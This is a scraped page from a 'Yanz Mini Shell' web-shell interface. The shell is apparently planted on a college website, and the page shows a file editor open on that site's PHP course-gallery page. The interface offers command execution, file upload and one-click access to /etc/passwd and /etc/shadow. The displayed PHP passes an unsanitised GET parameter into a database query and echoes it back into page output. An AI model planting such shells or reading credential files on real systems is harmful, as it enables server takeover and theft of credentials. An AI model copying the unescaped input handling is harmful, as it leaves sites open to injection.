Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
mvnjsrvrcollege
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php include("config.php"); $course = $_GET['course']; $course_info = $db->selectRow('subjects', '*', $course); $department_info = $db->selectRow('departments', '*', $course_info['department']); $galleries = $db->select('department_galleries', '*', array('subject'=>$course), 'ORDER BY id DESC'); ?> <!DOCTYPE html> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>MVN JS & RVR COLLEGE OF ARTS & SCIENCE</title> <!-- Stylesheets --> <link href="css\bootstrap.css" rel="stylesheet"> <link href="css\revolution-slider.css" rel="stylesheet"> <link href="css\style.css" rel="stylesheet"> <link rel="stylesheet" href="css\side-menu.css"> <script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script> <!--Favicon--> <link rel="shortcut icon" href="images\favicon.ico" type="image/x-icon"> <link rel="icon" href="images\favicon.ico" type="image/x-icon"> <!-- Responsive --> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <link href="css\responsive.css" rel="stylesheet"> <link href='css/styles.css' rel='stylesheet' type='text/css'> <!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]--> <!--[if lt IE 9]><script src="js/respond.js"></script><![endif]--> </head> <body> <div class="page-wrapper"> <!-- <div class="preloader"></div> --> <!-- Main Header--> <header class="main-header"> <?php include("includes/headerr.php"); ?> </header> <!--End Main Header --> <!--Page Title--> <section class="page-title" style="background-image:url(images/background/page-title-2.jpg);"> <div class="auto-container"> <h1><?php echo $course_info['subject']; ?></h1> </div> </section> <!--Page Info--> <section class="page-info"> <div class="auto-container clearfix"> <div class="pull-left"><h3 style="color:#339933;"><?php echo $course_info['subject']; ?></h3></div> <div class="pull-right"> <ul class="bread-crumb clearfix"> <li><a href="index.html">Home</a></li> <li><?php echo $course_info['subject']; ?></li> </ul> </div> </div> </section> <section id="single_Service" class="sec-padding"> <div class="container"> <div class="row"> <div class="col-sm-3 col-xs-12"> <?php include("includes/department-menu.php"); ?> </div> <div class="col-sm-9 col-xs-12"> <div class="tab-content"> <div class="service_mainconetent" id="invisalign"> <div class="about_box"> <style type="text/css"> p{ color:#0B615E;}; </style> <br> <table style="width:100%" cellspacing="0" cellpadding="0" border="1"> <tbody> <tr> <td style="width:56px; background:#eee;"><p style="text-align: center;"> <span style="color:#ff8c00; font-size:16px;"><strong>S.No</strong></span></span></p></td> <td style="width:402px; background:#eee;"><p style="text-align: center;"> <span style="color:#ff8c00; font-size:16px;"><strong>Events/Activities</strong></span></span></p></td> <td style="width:210px; background:#eee;"><p style="text-align: center;"> <span style="color:#ff8c00; font-size:16px;"><strong>View</strong></span></span></p></td> </tr> <?php $i = 1; foreach($galleries as $gallery){ ?> <tr> <td><p align="center"> <span style="font-size:16px;"><?php echo $i; ?></span></p></td> <td align="center"><p> <span style="font-size:16px;"><?php echo $gallery->title; ?></span></p></td> <td><p align="center"> <span style="font-size:16px;"><a href="gallery-details.php?course=<?php echo $course; ?>&gallery=<?php echo $gallery->id; ?>">View</a></span></p></td> </tr> <?php $i++; } ?> </tbody> </table> </div> <hr> <div class="row"> <div class="col-lg-12 col-md-12"> <div class="service_table"> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <!--Main Footer--> <footer class="main-footer"> <?php include("includes/footerr.php"); ?> </footer> </div> <!--End pagewrapper--> <!--Scroll to top--> <div class="scroll-to-top scroll-to-target" data-target=".main-header"><span class="icon fa fa-long-arrow-up"></span></div> <script src="js\jquery.js"></script> <script src="js\bootstrap.min.js"></script> <script src="js\revolution.min.js"></script> <script src="js\jquery.fancybox.pack.js"></script> <script src="js\jquery.fancybox-media.js"></script> <script src="js\owl.js"></script> <script src="js\validate.js"></script> <script src="js\wow.js"></script> <script src="js\script.js"></script> <script src="js\side-menu.js"></script> </body> </html>
Free Space : 341017284608 Byte